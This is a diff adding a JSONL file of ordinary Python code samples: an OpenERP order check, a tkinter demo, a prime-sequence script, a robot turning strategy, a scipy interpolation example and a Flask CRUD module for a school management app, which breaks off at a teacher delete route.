diff --git "a/4756.jsonl" "b/4756.jsonl" new file mode 100644--- /dev/null +++ "b/4756.jsonl" @@ -0,0 +1,687 @@ +{"seq_id":"300630594","text":"from openerp.osv import fields, osv\n\nclass sale(osv.Model):\n _name = 'sale.order'\n _inherit = ['sale.order']\n\n def check_order(self, cr, uid, ids, context=None):\n #def action_button_confirm(self, cr, uid, ids, context=None):\n \"\"\"\n Validates the zip code of the partner before confirming this order.\n :param cr: the db cursor\n :param uid: the user id\n :param ids: the ids of the sales order\n :param context: the openerp context\n :return: the same as the super method returns if validation succeeds. If not an exception is thrown and a\n message is displayed to the user.\n \"\"\"\n saleOrder = self.browse(cr, uid, ids[0], context=context)\n if saleOrder and saleOrder.partner_shipping_id:\n if context:\n context.update({'wf_sale': True})\n else:\n context = {'wf_sale': True}\n check = self.pool.get('res.partner').validate_zip(cr, uid, [saleOrder.partner_shipping_id.id], context=context)\n if not check:\n self.write(cr,uid, saleOrder.id,{'wf_confirm_failure': '6'})\n\n #return super(sale, self).action_button_confirm(cr, uid, ids, context=context)\n return super(sale, self).check_order(cr, uid, ids, context=None)\n\n","sub_path":"hf_zipcode_validation_AWN_HF_4/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"367750056","text":"from tkinter import *\r\n\r\ndef drawCirc():\r\n sel = LB.curselection()\r\n print(sel)\r\n can.delete(\"all\")\r\n k=sel[0]\r\n radius=[10,25,50]\r\n off=radius[k]\r\n center=100\r\n can.create_oval(center-off, center-off, center+off, center+off, outline=\"red\", fill=\"blue\", width=2)\r\n\r\n\r\ndef onSelect(event):\r\n drawCirc()\r\n \r\ndef press():\r\n can.delete(\"all\")\r\n \r\n #center.bell()\r\n\r\n\r\ndef set_up():\r\n global left,right,top,center,can,LB,TB\r\n\r\n root.geometry(\"800x600\")\r\n root.configure(bg=\"yellow\")\r\n #root.resizable(width=FALSE, height=FALSE)\r\n \r\n top = Frame(root,width=800,height=60,bg=\"red\")\r\n #top.pack(side = TOP, fill=BOTH)\r\n top.pack(side = TOP)\r\n \r\n right = Frame(root,width=100,height=500,bg=\"blue\")\r\n right.pack(side = RIGHT, fill=BOTH)\r\n\r\n left = Frame(root,width=100,height=500,bg=\"green\")\r\n left.pack(side = LEFT, fill=BOTH)\r\n\r\n center = Frame(root,width=600,height=540,bg=\"yellow\")\r\n center.pack(side = TOP, fill=BOTH)\r\n\r\n can=Canvas(center,width=200,height=200,bg=\"pink\")\r\n can.pack(side=TOP)\r\n\r\n but = Button(left,text=\"clear\",width=10,command=press)\r\n but.pack(side=TOP,fill=X)\r\n\r\n LB = Listbox(right)\r\n LB.configure({\"height\":5,\"font\":(\"Verdana\",18),\"bg\":\"white\",\"fg\":\"red\",\"width\":7})\r\n LB.pack()\r\n\r\n command=[\"small\",\"medium\",\"large\"]\r\n for cmd in command:\r\n LB.insert(END, cmd)\r\n LB.select_set(0)\r\n LB.bind(\"<>\", onSelect)\r\n drawCirc()\r\n\r\nroot = Tk()\r\nset_up()\r\nmainloop()\r\n","sub_path":"C15_apr11/frame5.py","file_name":"frame5.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"72668788","text":"def isPrime(num):\n if num > 1:\n for i in range(2, int(num/2)+1):\n\n if (num % i) == 0:\n return False\n break\n else:\n return True\n\n else:\n return False\n\ndef findLong(a, n):\n\n ans = []\n m = 0\n t = 0\n for i in range(n):\n \n if i != n - 1 and a[i] 
< a[i + 1]:\n t += 1\n else:\n if m < t:\n m = t\n ans = a[i - m:i + 1]\n t = 0\n\n ans = [str(i) for i in ans]\n ans = ' '.join(ans)\n return ans\n\n\n\nt = int(input())\nl = list(map(int, input().split()))\np = []\n\nfor item in l:\n if isPrime(item):\n p.append(item)\n\nprint(findLong(p, len(p)))\n","sub_path":"Contests/Women Technologists Codesprint/GCTC_Coding_Contest/h.py","file_name":"h.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"602629947","text":"from .stratTourne import StratTourne\n\nclass StratTourneplus(StratTourne):\n \"\"\"\n This strategy slows the robot down progressively as it turns towards the angle self.angle,\n so that it gets as close as possible to the target angle without overshooting it\n \"\"\"\n def __init__(self, robot, angle, vitesse):\n StratTourne.__init__(self,robot,angle,vitesse)\n self.ralenti = 0\n \n def step(self):\n angleg = (self.robot.get_motor_position()[0]*self.robot.WHEEL_CIRCUMFERENCE) /(self.robot.WHEEL_BASE_CIRCUMFERENCE)\n angled = (self.robot.get_motor_position()[1]*self.robot.WHEEL_CIRCUMFERENCE) /(self.robot.WHEEL_BASE_CIRCUMFERENCE)\n \n super().step()\n \n # Halve the rotation speed of both wheels once the robot's rotation angle\n # reaches 4/5 of the target angle\n if(self.ralenti == 0 and (angleg >= self.angle*(4/5) or angled <= -self.angle*(4/5))):\n self.robot.set_motor_dps(1, (self.vit/2))\n self.robot.set_motor_dps(2, -(self.vit/2))\n self.vit = (self.vit/2)\n self.ralenti = 1\n \n # Halve the rotation speed of both wheels once the robot's rotation angle\n # reaches 5/6 of the target angle\n if(self.ralenti == 1 and (angleg >= self.angle*(5/6) or angled <= -self.angle*(5/6))):\n self.robot.set_motor_dps(1, (self.vit/2))\n self.robot.set_motor_dps(2, -(self.vit/2))\n self.vit = (self.vit/2)\n self.ralenti = 2\n \n","sub_path":"strategie/stratTourneplus.py","file_name":"stratTourneplus.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"110634763","text":"from scipy.interpolate import interp1d \nimport numpy as np\nimport matplotlib.pyplot as plot\n\nx = np.linspace(0,10, num=11, endpoint = True)\ny = np.cos(-x**2/9.0)\n#linear interpolation\nf = interp1d(x,y)\n#cubic spline interpolation\nf2 = interp1d(x,y,kind = 'cubic')\nxnew = np.linspace(0,10,num=41,endpoint = True)\nplot.plot(x,y,'o',xnew,f(xnew),'-',xnew,f2(xnew),'--')\n\nplot.legend(['data','linear','cubic'],loc = 'best')\nplot.show() \n","sub_path":"scipy_examples/interpolate_2d.py","file_name":"interpolate_2d.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"329920010","text":"from app import app, db\nfrom flask import render_template, redirect, url_for, flash, request\nfrom app.forms import SchoolFormCreate, SchoolFormUpdate, \\\n PromoFormCreate, PromoFormUpdate, BranchFormCreate, BranchFormUpdate, \\\n AnnualFormCreate, AnnualFormUpdate, \\\n SemesterFormCreate, SemesterFormUpdate, SemesterFormSpecialUpdate, \\\n WilayaFormCreate, WilayaFormUpdate, TeacherFormCreate, TeacherFormUpdate\nfrom app.models import School, Branch, Annual, Semester, Module, Unit, Wilaya, Promo, Teacher\nfrom flask_breadcrumbs import register_breadcrumb\n# import babel\nfrom datetime import datetime\nfrom sqlalchemy import or_\n\n# from app.prencipal import 
*\n\n\n\n#######################################\n##### INDEX #####\n\n@app.route('/basic-tables/')\n@register_breadcrumb(app, '.basic', 'Basic Tables')\ndef basic_index():\n return render_template('basic-forms/index.html', title='Basic Tables List')\n\n\n#######################################\n##### Promo #####\n\n@app.route('/promo/')\n@register_breadcrumb(app, '.basic.promo', 'Promos')\ndef promo_index():\n # i have to order by school & branch\n promos = Promo.query.order_by(Promo.branch_id, Promo.start_date).all()\n return render_template('basic-forms/promo/index.html', title='Promos List', promos=promos)\n\n@app.route('/promo/create/', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.promo.create', 'Create')\ndef promo_create():\n form = PromoFormCreate()\n \n if form.validate_on_submit():\n promo = Promo(\n name=form.name.data, \n display_name=form.display_name.data, \n branch_id=form.branch_id.data, \n # start_date=form.start_date.data, \n start_date=convert_dtstr_to_dt('start_date_str', extention='-01'), \n # finish_date=form.finish_date.data, \n finish_date=convert_dtstr_to_dt('finish_date_str', extention='-28'), \n color=form.color.data\n )\n db.session.add(promo)\n db.session.commit()\n flash('Created and Saved Successfully.', 'alert-success')\n return redirect(url_for('promo_view', id=promo.id))\n return render_template('basic-forms/promo/create.html', title='Promo Create', form=form)\n\n\n\ndef convert_dtstr_to_dt(dt_name, in_format='%Y-%m-%d', out_format='%Y-%m-%d', extention='-01'):\n dt = None\n if request.method == 'POST':\n dt_request = request.form.get(dt_name)\n if dt_request != None and dt_request != '':\n # \n # case : in_format\n dt_string = str(dt_request)+extention\n # \n # \n # \n # \n dt = datetime.strptime(dt_string, out_format)\n return dt\n\n\n\n@app.route('/promo/update//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.promo.view.update', 'Update')\ndef promo_update(id):\n promo = Promo.query.get_or_404(id)\n form = PromoFormUpdate(promo.id)\n \n if form.validate_on_submit():\n promo.name = form.name.data\n promo.display_name = form.display_name.data\n # promo.branch_id = form.branch_id.data\n # promo.start_date = form.start_date.data\n promo.start_date = convert_dtstr_to_dt('start_date_str', extention='-01')\n # promo.finish_date = form.finish_date.data\n promo.finish_date = convert_dtstr_to_dt('finish_date_str', extention='-28')\n\n promo.color = form.color.data\n db.session.commit()\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('promo_view', id=promo.id))\n elif request.method == 'GET':\n form.name.data = promo.name\n form.display_name.data = promo.display_name\n form.start_date.data = promo.start_date\n # if promo.start_date != None and promo.start_date != '':\n # form.start_date.data = promo.start_date.strftime(\"%d/%m/%Y\")\n form.finish_date.data = promo.finish_date\n form.branch_id.data = promo.branch_id\n form.color.data = promo.color\n return render_template('basic-forms/promo/update.html', title='Promo Update', form=form)\n\n@app.route('/promo//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.promo.view', 'View')\ndef promo_view(id):\n promo = Promo.query.get_or_404(id)\n return render_template('basic-forms/promo/view.html', title='Promo View', promo=promo)\n\n@app.route('/promo/delete//', methods=['GET', 'POST'])\ndef promo_delete(id):\n promo = Promo.query.get_or_404(id)\n # Note:\n # has sessions or annual sessions\n if len(promo.sessions) > 0:\n flash(\"you can't 
delete this Promo because it is in Relation with other Records\", 'alert-danger')\n flash(\"you have to break the relation with the Sessions first\")\n return redirect(url_for('promo_view', id=id))\n\n db.session.delete(promo)\n db.session.commit()\n flash('Promo: ' + str(promo.name) + ' is deleted', 'alert-success')\n return redirect(url_for('promo_index'))\n\n\n#######################################\n##### School #####\n\n@app.route('/school/')\n@register_breadcrumb(app, '.basic.school', 'Schools')\ndef school_index():\n schools = School.query.all()\n return render_template('basic-forms/school/index.html', title='Schools List', schools=schools)\n\n@app.route('/school/create/', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.school.create', 'Create')\ndef school_create():\n form = SchoolFormCreate()\n if form.validate_on_submit():\n school = School(\n name=form.name.data, \n description=form.description.data\n )\n db.session.add(school)\n db.session.commit()\n flash('Created and Saved Successfully.', 'alert-success')\n return redirect(url_for('school_view', id=school.id))\n return render_template('basic-forms/school/create.html', title='School Create', form=form)\n\n@app.route('/school/update//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.school.view.update', 'Update')\ndef school_update(id):\n school = School.query.get_or_404(id)\n form = SchoolFormUpdate(school.id)\n if form.validate_on_submit():\n school.name = form.name.data\n school.description = form.description.data\n db.session.commit()\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('school_view', id=school.id))\n elif request.method == 'GET':\n form.name.data = school.name\n form.description.data = school.description\n return render_template('basic-forms/school/update.html', title='School Update', form=form)\n\n@app.route('/school//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.school.view', 'View')\ndef school_view(id):\n school = School.query.get_or_404(id)\n return render_template('basic-forms/school/view.html', title='School View', school=school)\n\n@app.route('/school/delete//', methods=['GET', 'POST'])\ndef school_delete(id):\n school = School.query.get_or_404(id)\n if len(school.branches) > 0:\n flash(\"you can't delete this School because it is in Relation with other Records\", 'alert-danger')\n flash(\"you have to break the relation with the Branches first\")\n return redirect(url_for('school_view', id=id))\n db.session.delete(school)\n db.session.commit()\n flash('School: ' + str(school.name) + ' is deleted', 'alert-success')\n return redirect(url_for('school_index'))\n\n\n#######################################\n##### Branch #####\n\n@app.route('/branch/')\n@register_breadcrumb(app, '.basic.branch', 'Branches')\ndef branch_index():\n # i have to order by school & branch\n branches = Branch.query.order_by(Branch.school_id).all()\n return render_template('basic-forms/branch/index.html', title='Branches List', branches=branches)\n\n@app.route('/branch/create/', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.branch.create', 'Create')\ndef branch_create():\n form = BranchFormCreate()\n if form.validate_on_submit():\n branch = Branch(\n name=form.name.data, \n description=form.description.data, \n school_id=form.school_id.data\n )\n db.session.add(branch)\n db.session.commit()\n flash('Created and Saved Successfully.', 'alert-success')\n return redirect(url_for('branch_view', id=branch.id))\n return 
render_template('basic-forms/branch/create.html', title='Branch Create', form=form)\n\n@app.route('/branch/update//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.branch.view.update', 'Update')\ndef branch_update(id):\n branch = Branch.query.get_or_404(id)\n form = BranchFormUpdate(branch.id)\n if form.validate_on_submit():\n branch.name = form.name.data\n branch.description = form.description.data\n branch.school_id = form.school_id.data\n db.session.commit()\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('branch_view', id=branch.id))\n elif request.method == 'GET':\n form.name.data = branch.name\n form.description.data = branch.description\n form.school_id.data = branch.school_id\n return render_template('basic-forms/branch/update.html', title='Branch Update', form=form)\n\n@app.route('/branch//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.branch.view', 'View')\ndef branch_view(id):\n branch = Branch.query.get_or_404(id)\n return render_template('basic-forms/branch/view.html', title='Branch View', branch=branch)\n\n@app.route('/branch/delete//', methods=['GET', 'POST'])\ndef branch_delete(id):\n branch = Branch.query.get_or_404(id)\n if len(branch.promos) > 0 or len(branch.annuals) > 0 or len(branch.students) > 0:\n flash(\"you can't delete this Branch because it is in Relation with other Records\", 'alert-danger')\n if len(branch.promos) > 0:\n flash(\"you have to break the relation with the Sessions first\")\n if len(branch.annuals) > 0:\n flash(\"you have to break the relation with the Annuals first\")\n return redirect(url_for('branch_view', id=id))\n db.session.delete(branch)\n db.session.commit()\n flash('Branch: ' + str(branch.name) + ' is deleted', 'alert-success')\n return redirect(url_for('branch_index'))\n\n\n#######################################\n##### Annual #####\n\n@app.route('/annual/')\n@register_breadcrumb(app, '.basic.annual', 'Annuales')\ndef annual_index():\n # i have to order by school & annual\n annuals = Annual.query.join(Branch).order_by(Branch.id, Annual.annual).all()\n return render_template('basic-forms/annual/index.html', title='Annuals List', annuals=annuals)\n\n@app.route('/annual/create/', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.annual.create', 'Create')\ndef annual_create():\n form = AnnualFormCreate()\n if form.validate_on_submit():\n annual = Annual(\n name=form.name.data, \n display_name=form.display_name.data, \n annual=form.annual.data,\n branch_id=form.branch_id.data\n )\n db.session.add(annual)\n db.session.commit()\n flash('Created and Saved Successfully.', 'alert-success')\n return redirect(url_for('annual_view', id=annual.id))\n return render_template('basic-forms/annual/create.html', title='Annual Create', form=form)\n\n@app.route('/annual/update//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.annual.view.update', 'Update')\ndef annual_update(id):\n annual = Annual.query.get_or_404(id)\n form = AnnualFormUpdate(annual.id)\n if form.validate_on_submit():\n annual.name = form.name.data\n annual.display_name = form.display_name.data\n annual.annual = form.annual.data\n annual.branch_id = form.branch_id.data\n db.session.commit()\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('annual_view', id=annual.id))\n elif request.method == 'GET':\n form.name.data = annual.name\n form.display_name.data = annual.display_name\n form.annual.data = annual.annual\n form.branch_id.data = annual.branch_id\n return 
render_template('basic-forms/annual/update.html', title='Annual Update', form=form)\n\n@app.route('/annual//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.annual.view', 'View')\ndef annual_view(id):\n annual = Annual.query.get_or_404(id)\n return render_template('basic-forms/annual/view.html', title='Annual View', annual=annual)\n\n@app.route('/annual/delete//', methods=['GET', 'POST'])\ndef annual_delete(id):\n annual = Annual.query.get_or_404(id)\n if len(annual.promos) > 0 or len(annual.semesters) > 0:\n flash(\"you can't delete this Annual because it is in Relation with other Records\", 'alert-danger')\n if len(annual.promos) > 0:\n flash(\"you have to break the relation with the Promoss first\")\n if len(annual.semesters) > 0:\n flash(\"you have to break the relation with the Semesters first\")\n return redirect(url_for('annual_view', id=id))\n db.session.delete(annual)\n db.session.commit()\n flash('Annual: ' + str(annual.name) + ' is deleted', 'alert-success')\n return redirect(url_for('annual_index'))\n\n\n#######################################\n##### Semester #####\n\n@app.route('/semester/')\n@register_breadcrumb(app, '.basic.semester', 'Semesteres')\ndef semester_index():\n # i have to order by school & semester\n semesters = Semester.query.join(Annual)\\\n .order_by(Annual.id, Semester.semester, Semester.latest_update).all()\n return render_template('basic-forms/semester/index.html', title='Semesters List', semesters=semesters)\n\n@app.route('/semester/create/', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.semester.create', 'Create')\ndef semester_create():\n form = SemesterFormCreate()\n if form.validate_on_submit():\n semester = Semester(\n name=form.name.data, \n display_name=form.display_name.data, \n semester=form.semester.data,\n # is_closed=form.is_closed.data,\n annual_id=form.annual_id.data\n # latest_update\n )\n db.session.add(semester)\n db.session.commit()\n flash('Created and Saved Successfully.', 'alert-success')\n return redirect(url_for('semester_view', id=semester.id))\n return render_template('basic-forms/semester/create.html', title='Semester Create', form=form)\n\n@app.route('/semester/update//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.semester.view.update', 'Update')\ndef semester_update(id):\n semester = Semester.query.get_or_404(id)\n if semester.is_locked():\n flash(\"You can't update a closed Semester\")\n return redirect(url_for('semester_view', id=id))\n form = SemesterFormUpdate(id)\n if form.validate_on_submit():\n semester.name = form.name.data\n semester.display_name = form.display_name.data\n semester.semester = form.semester.data\n # semester.is_closed = form.is_closed.data\n semester.annual_id = form.annual_id.data\n db.session.commit()\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('semester_view', id=id))\n elif request.method == 'GET':\n form.name.data = semester.name\n form.display_name.data = semester.display_name\n form.semester.data = semester.semester\n # form.is_closed.data = semester.is_closed\n form.annual_id.data = semester.annual_id\n return render_template('basic-forms/semester/update.html', title='Semester Update', form=form)\n\n@app.route('/semester/duplication-update//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.semester.view.update', 'Update Name')\ndef semester_special_update(id):\n semester = Semester.query.get_or_404(id)\n form = SemesterFormSpecialUpdate(id)\n if form.validate_on_submit():\n semester.name = 
form.name.data\n db.session.commit()\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('semester_view', id=id))\n elif request.method == 'GET':\n form.name.data = semester.name\n return render_template('basic-forms/semester/update.html', title='Semester Duplication Update', form=form)\n\ndef semester_view_dlc(*args, **kwargs):\n id = request.view_args['id']\n semester = Semester.query.get_or_404(id)\n return [{'text': 'S '+str(semester.get_nbr()), 'url': url_for('semester_view', id=id)}]\n\n@app.route('/semester//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.semester.view', '', dynamic_list_constructor=semester_view_dlc)\ndef semester_view(id):\n semester = Semester.query.get_or_404(id)\n return render_template('basic-forms/semester/view.html', title='Semester View', semester=semester)\n\n# WARNING: i have to check before i delete\n@app.route('/semester/delete//', methods=['GET', 'POST'])\ndef semester_delete(id):\n semester = Semester.query.get_or_404(id)\n if len(semester.sessions) > 0:\n flash(\"you can't delete this Semester because it is in Relation with other Records\", 'alert-danger')\n flash(\"you have to break the relation with the Sessions first\")\n return redirect(url_for('semester_view', id=id))\n db.session.delete(semester)\n db.session.commit()\n flash('Semester: ' + str(semester.name) + ' is deleted', 'alert-success')\n return redirect(url_for('semester_index'))\n\n@app.route('/semester/close//', methods=['GET', 'POST'])\ndef semester_close(id):\n semester = Semester.query.get_or_404(id)\n for parallel in semester.get_parallels():\n if parallel.is_locked() == True:\n parallel.is_closed = True\n semester.is_closed = True\n db.session.commit()\n flash(\"this Semester is now Closed\", 'alert-success')\n return redirect(url_for('semester_view', id=id))\n\n@app.route('/semester/open//', methods=['GET', 'POST'])\ndef semester_open(id):\n semester = Semester.query.get_or_404(id)\n for parallel in semester.get_parallels():\n if parallel.is_locked() != True:\n flash(\"you can have only one Open Semester at a time\", \"alert-danger\")\n return redirect(url_for('semester_index'))\n semester.is_closed = False\n db.session.commit()\n flash(\"this Semester is now Open\", 'alert-success')\n return redirect(url_for('semester_view', id=id))\n\n# you can find Semester Duplication \n# in routesConfig.py duplicate_config()\n\n\n#######################################\n##### Unit #####\n\n@app.route('/unit/delete//', methods=['GET', 'POST'])\ndef unit_delete(id):\n unit = Module.query.get_or_404(id)\n if len(unit.grades) > 0 or len(unit.unit_sessions) > 0 or len(unit.percentages) > 0:\n flash(\"you can't delete this Module because it is in Relation with other Records\", 'alert-danger')\n if len(unit.grades) > 0:\n flash(\"you have to break the relation with the Grades first\")\n if len(unit.unit_sessions) > 0:\n flash(\"you have to break the relation with the ModuleSessions first\")\n if len(unit.unit_sessions) > 0:\n flash(\"you have to break the relation with the ModuleSessions first\")\n return redirect(url_for('unit_view', id=id))\n db.session.delete(unit)\n db.session.commit()\n flash('Module: ' + str(unit.name) + ' is deleted', 'alert-success')\n return redirect(url_for('unit_index'))\n\n\n#######################################\n##### Percantage #####\n\n\n#######################################\n##### Module #####\n\n@app.route('/module/')\n@register_breadcrumb(app, '.basic.module', 'Modules')\ndef module_index():\n modules = 
Module.query.join(Unit)\\\n .join(Semester)\\\n .join(Annual).join(Branch).join(School)\\\n .order_by(School.name, Branch.name, Annual.annual, Semester.semester, Unit.name, Module.code)\\\n .all()\n\n open_modules = []\n for module in modules:\n semester = module.unit.semester\n if semester.is_locked() == True and len(semester.get_parallels()) > 1:\n continue\n open_modules.append(module)\n\n return render_template('basic-forms/module/index.html', title='Modules List', modules=open_modules)\n\n\n# @app.route('/module/create/', methods=['GET', 'POST'])\n# @register_breadcrumb(app, '.basic.module.create', 'Create')\n# def module_create():\n# form = ModuleFormCreate()\n# if form.validate_on_submit():\n# module = Module(\n# code=form.code.data, \n# name=form.name.data, \n# display_name=form.display_name.data, \n# coefficient=form.coefficient.data, \n# credit=form.credit.data, \n# time=form.credit.data, \n# order=form.credit.data, \n# unit_id=form.unit_id.data\n# )\n# db.session.add(module)\n# db.session.commit()\n# flash('Created and Saved Successfully.', 'alert-success')\n# return redirect(url_for('module_view', id=module.id))\n# return render_template('basic-forms/module/create.html', title='Module Create', form=form)\n\n# @app.route('/module/update//', methods=['GET', 'POST'])\n# @register_breadcrumb(app, '.basic.module.view.update', 'Update')\n# def module_update(id):\n# module = Module.query.get_or_404(id)\n# form = ModuleFormUpdate(module.id)\n# if form.validate_on_submit():\n# module.code = form.code.data\n# module.name = form.name.data\n# module.display_name = form.display_name.data\n# # module.coefficient = form.coefficient.data\n# # module.credit = form.credit.data\n# # module.time = form.time.data\n# # module.order = form.order.data\n# # module.unit_id = form.unit_id.data\n# db.session.commit()\n# flash('Your changes have been saved.', 'alert-success')\n# return redirect(url_for('module_view', id=module.id))\n# elif request.method == 'GET':\n# form.code.data = module.code\n# form.name.data = module.name\n# form.display_name.data = module.display_name\n# # form.coefficient.data = module.coefficient\n# # form.credit.data = module.credit\n# # form.time.data = module.time\n# # form.order.data = module.order\n# # form.unit_id.data = module.unit_id\n# return render_template('basic-forms/module/update.html', title='Module Update', form=form)\n\n@app.route('/module//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.module.view', 'View')\ndef module_view(id):\n module = Module.query.get_or_404(id)\n return render_template('basic-forms/module/view.html', title='Module View', module=module)\n\n# @app.route('/module/delete//', methods=['GET', 'POST'])\n# def module_delete(id):\n# module = Module.query.get_or_404(id)\n# if len(module.grades) > 0 or len(module.module_sessions) > 0 or len(module.percentages) > 0:\n# flash(\"you can't delete this Module because it is in Relation with other Records\", 'alert-danger')\n# if len(module.grades) > 0:\n# flash(\"you have to break the relation with the Grades first\")\n# if len(module.module_sessions) > 0:\n# flash(\"you have to break the relation with the ModuleSessions first\")\n# if len(module.module_sessions) > 0:\n# flash(\"you have to break the relation with the ModuleSessions first\")\n# return redirect(url_for('module_view', id=id))\n# db.session.delete(module)\n# db.session.commit()\n# flash('Module: ' + str(module.name) + ' is deleted', 'alert-success')\n# return 
redirect(url_for('module_index'))\n\n\n#######################################\n##### Wilaya #####\n\n@app.route('/wilaya/')\n@register_breadcrumb(app, '.basic.wilaya', 'Wilayas')\ndef wilaya_index():\n wilayas = Wilaya.query.all()\n return render_template('basic-forms/wilaya/index.html', title='Wilayas List', wilayas=wilayas)\n\n@app.route('/wilaya/create/', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.wilaya.create', 'Create')\ndef wilaya_create():\n form = WilayaFormCreate()\n if form.validate_on_submit():\n wilaya = Wilaya(\n code=form.code.data, \n name=form.name.data, \n )\n db.session.add(wilaya)\n db.session.commit()\n flash('Created and Saved Successfully.', 'alert-success')\n return redirect(url_for('wilaya_view', id=wilaya.id))\n return render_template('basic-forms/wilaya/create.html', title='Wilaya Create', form=form)\n\n@app.route('/wilaya/update//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.wilaya.view.update', 'Update')\ndef wilaya_update(id):\n wilaya = Wilaya.query.get_or_404(id)\n form = WilayaFormUpdate(wilaya.id)\n if form.validate_on_submit():\n wilaya.code = form.code.data\n wilaya.name = form.name.data\n db.session.commit()\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('wilaya_view', id=wilaya.id))\n elif request.method == 'GET':\n form.code.data = wilaya.code\n form.name.data = wilaya.name\n return render_template('basic-forms/wilaya/update.html', title='Wilaya Update', form=form)\n\n@app.route('/wilaya//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.wilaya.view', 'View')\ndef wilaya_view(id):\n wilaya = Wilaya.query.get_or_404(id)\n return render_template('basic-forms/wilaya/view.html', title='Wilaya View', wilaya=wilaya)\n\n# WARNING: i have to check before i delete\n@app.route('/wilaya/delete//', methods=['GET', 'POST'])\ndef wilaya_delete(id):\n wilaya = Wilaya.query.get_or_404(id)\n if len(wilaya.students) > 0 or len(wilaya.teachers) > 0:\n flash(\"you can't delete this Wilaya because it is in Relation with other Records\", 'alert-danger')\n if len(wilaya.students) > 0:\n flash(\"you have to break the relation with the Students first\")\n if len(wilaya.teachers) > 0:\n flash(\"you have to break the relation with the Teachers first\")\n return redirect(url_for('wilaya_view', id=id))\n db.session.delete(wilaya)\n db.session.commit()\n flash('Wilaya: ' + str(wilaya.name) + ' is deleted', 'alert-success')\n return redirect(url_for('wilaya_index'))\n\n\n#######################################\n##### Teacher #####\n\n@app.route('/teacher/')\n@register_breadcrumb(app, '.basic.teacher', 'Teachers')\ndef teacher_index():\n teachers = Teacher.query.all()\n return render_template('basic-forms/teacher/index.html', title='Teachers List', teachers=teachers)\n\n@app.route('/teacher/create/', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.teacher.create', 'Create')\ndef teacher_create():\n form = TeacherFormCreate()\n if form.validate_on_submit():\n teacher = Teacher(\n username=form.username.data,\n title=form.title.data, \n last_name=form.last_name.data, \n first_name=form.first_name.data,\n # last_name_arab=form.last_name_arab.data,\n # first_name_arab=form.first_name_arab.data,\n email=form.email.data,\n birth_date=form.birth_date.data,\n birth_place=form.birth_place.data,\n address=form.address.data,\n wilaya_id=form.wilaya_id.data,\n sex=form.sex.data,\n phone=form.phone.data,\n ccp=form.ccp.data\n )\n db.session.add(teacher)\n db.session.commit()\n flash('Created and 
Saved Successfully.', 'alert-success')\n return redirect(url_for('teacher_view', id=teacher.id))\n return render_template('basic-forms/teacher/create.html', title='Teacher Create', form=form)\n\n@app.route('/teacher/update//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.teacher.view.update', 'Update')\ndef teacher_update(id):\n teacher = Teacher.query.get_or_404(id)\n form = TeacherFormUpdate(teacher.id)\n if form.validate_on_submit():\n teacher.username = form.username.data\n teacher.title = form.title.data\n teacher.last_name = form.last_name.data\n teacher.first_name = form.first_name.data\n # teacher.last_name_arab = form.last_name_arab.data\n # teacher.first_name_arab = form.first_name_arab.data\n if len(form.email.data) > 0:\n teacher.email = form.email.data\n teacher.birth_date = form.birth_date.data\n teacher.birth_place = form.birth_place.data\n teacher.address = form.address.data\n teacher.wilaya_id = form.wilaya_id.data\n teacher.sex = form.sex.data\n teacher.phone = form.phone.data\n teacher.ccp = form.ccp.data\n db.session.commit()\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('teacher_view', id=teacher.id))\n elif request.method == 'GET':\n form.username.data = teacher.username\n form.title.data = teacher.title\n form.last_name.data = teacher.last_name\n form.first_name.data = teacher.first_name\n # form.last_name_arab.data = teacher.last_name_arab\n # form.first_name_arab.data = teacher.first_name_arab\n form.email.data = teacher.email\n form.birth_date.data = teacher.birth_date\n form.birth_place.data = teacher.birth_place\n form.address.data = teacher.address\n form.wilaya_id.data = teacher.wilaya_id\n form.sex.data = teacher.sex\n form.phone.data = teacher.phone\n form.ccp.data = teacher.ccp\n return render_template('basic-forms/teacher/update.html', title='Teacher Update', form=form)\n\n@app.route('/teacher//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.teacher.view', 'View')\ndef teacher_view(id):\n teacher = Teacher.query.get_or_404(id)\n return render_template('basic-forms/teacher/view.html', title='Teacher View', teacher=teacher)\n\n# WARNING: i have to check before i delete\n@app.route('/teacher/delete//', 